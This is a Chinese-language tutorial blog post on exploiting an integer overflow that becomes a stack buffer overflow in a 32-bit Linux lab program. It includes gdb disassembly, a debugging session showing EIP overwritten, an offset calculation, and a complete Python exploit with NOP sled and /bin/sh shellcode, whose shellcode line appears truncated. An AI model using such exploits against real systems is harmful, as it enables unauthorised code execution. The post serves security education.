Linux Exploit系列之二 整数溢出

整数溢出

虚拟机安装：Ubuntu 12.04（x86）

什么是整数溢出？

存储大于最大支持值的值称为整数溢出。整数溢出本身不会导致任意代码执行，但整数溢出可能会导致堆栈溢出或堆溢出，这可能导致任意代码执行。在这篇文章中，我将仅谈论整数溢出导致堆栈溢出，整数溢出导致堆溢出将在后面的单独的帖子中讨论。

后边的内容复制粘贴好烦，还是说关键点吧！

原文见：https://bbs.pediy.com/thread-216869.htm

这个文章解释的比上一个清楚多了，相信能看懂，唯一不懂的，和上一篇估计一样，还是地址计算的问题

同样是使用gdb 调试：gdb -q vuln

下边解释下我是如何找地址的(虚拟机环境Ubuntu14.04 32位系统，gcc 4.8.2)

首先使用disassemble 查看汇编代码，看看程序的汇编代码布局：

 1 (gdb) disassemble validate_passwd
 2 Dump of assembler code for function validate_passwd:
 3    0x08048507 <+0>:    push   %ebp
 4    0x08048508 <+1>:    mov    %esp,%ebp
 5    0x0804850a <+3>:    sub    $0x28,%esp
 6    0x0804850d <+6>:    mov    0x8(%ebp),%eax
 7    0x08048510 <+9>:    mov    %eax,(%esp)
 8    0x08048513 <+12>:    call   0x80483e0 <strlen@plt>
 9    0x08048518 <+17>:    mov    %al,-0x9(%ebp)
10    0x0804851b <+20>:    cmpb   $0x3,-0x9(%ebp)
11    0x0804851f <+24>:    jbe    0x8048554 <validate_passwd+77>
12    0x08048521 <+26>:    cmpb   $0x8,-0x9(%ebp)
13    0x08048525 <+30>:    ja     0x8048554 <validate_passwd+77>
14    0x08048527 <+32>:    movl   $0x8048670,(%esp)
15    0x0804852e <+39>:    call   0x80483b0 <puts@plt>
16    0x08048533 <+44>:    mov    0x804a040,%eax
17    0x08048538 <+49>:    mov    %eax,(%esp)
18    0x0804853b <+52>:    call   0x8048390 <fflush@plt>
19    0x08048540 <+57>:    mov    0x8(%ebp),%eax
20    0x08048543 <+60>:    mov    %eax,0x4(%esp)
21    0x08048547 <+64>:    lea    -0x14(%ebp),%eax
22    0x0804854a <+67>:    mov    %eax,(%esp)
23    0x0804854d <+70>:    call   0x80483a0 <strcpy@plt>

嗯，发现编译器改动不大，就是将strlen函数直接内嵌了，没有使用函数调用(库函数的惯用做法)，不多解释

(gdb) list 看一眼源码，方便下断点

(gdb) b validate_passwd 下断

然后开心的按照作者说的运行

下边是调试步骤

 1 Reading symbols from vuln...done.
 2 (gdb) b validate_passwd
 3 Breakpoint 1 at 0x804850d: file vuln.c, line 14.
 4 (gdb) r sploitfun `python -c 'print "A"*261'`
 5 Starting program: /home/jourluohua/work/test2/vuln sploitfun `python -c 'print "A"*261'`
 6 
 7 Breakpoint 1, validate_passwd (
 8     passwd=0xbffff6b6 'A' <repeats 200 times>...) at vuln.c:14
 9 14     unsigned char passwd_len = strlen(passwd); /* [1] */ 
10 (gdb) n　　　　　　　　//单步调试，想看看执行到了我们认为的关键的代码没有，很明显这儿还不是关键代码
11 15     if(passwd_len >= 4 && passwd_len <= 8) { /* [2] */
12 (gdb) n
13 16      printf("Valid Password\n"); /* [3] */ 
14 (gdb) p passwd_len　　//这儿是关键处了，但是如果是正确的话，passwd_len 应该是'A',很可能是程序还没真正执行到
15 $1 = 5 '\005'
16 (gdb) n
17 Valid Password
18 17      fflush(stdout);
19 (gdb) n
20 18      strcpy(passwd_buf,passwd); /* [4] */
21 (gdb) n
22 23     store_passwd_indb(passwd_buf); /* [6] */
23 (gdb) p passwd_len　　　　//好终于到了我们想要的地方了
24 $2 = 65 'A'
25 (gdb) p &passwd_len　　　//passwd_len的地址，既然利用的是栈，我们在乎的是内存布局
26 $3 = (unsigned char *) 0xbffff46f 'A' <repeats 200 times>...
27 (gdb) p buf　　　　　　　　//手误，没有任何原因
28 $4 = 0x0
29 (gdb) n
30 24    }
31 (gdb) p passwd_buf　　　　//passwd_buf的值也对了
32 $5 = 'A' <repeats 11 times>
33 (gdb) p &passwd_buf[0]　　//passwd_buf的地址也和我们想象的一样
34 $6 = 0xbffff464 'A' <repeats 200 times>...
35 (gdb) p/x $eip　　　　　　//很明显还没有被覆盖
36 $7 = 0x8048578
37 (gdb) p/x $ebp　　　　　　//这个真的不是在凑字数，ebp的地址很重要
38 $8 = 0xbffff478
39 (gdb) n
40 0x41414141 in ?? ()
41 (gdb) p/x $eip　　　　　　//好，已经覆盖了
42 $9 = 0x41414141
43 (gdb) p/x $ebp
44 $10 = 0x41414141
45 (gdb) 

按照我上边的注释，相信大家对调试过程已经有了一定了解，现在说下地址的计算

$ebp - &passwd_buf[0] +4   = 0x18 = $eip - &passwd_buf[0]

这就是所谓的内存偏移，有了这个，我们的ret_addr就可以算出来了

ret_addr= 0xbffff464 +0x18 + 100

还是老规矩，附上我的exp.python 代码

 1 #exp.py 
 2 #!/usr/bin/env python
 3 import struct
 4 from subprocess import call
 5 
 6 arg1 = "sploitfun"
 7 
 8 #Stack address where shellcode is copied.
 9 ret_addr = 0xbffff4e0
10 
11 #Spawn a shell
12 #execve(/bin/sh)
13 scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\$
14 
15 #endianess convertion
16 def conv(num):
17  return struct.pack("<I",num)#unk + RA + NOP's + Shellcode
18 arg2 = "A" * 24
19 arg2 += conv(ret_addr);
20 arg2 += "\x90" * 100
21 arg2 += scode
22 arg2 += "C" * 108
23 
24 print "Calling vulnerable program"
25 call(["./vuln", arg1, arg2])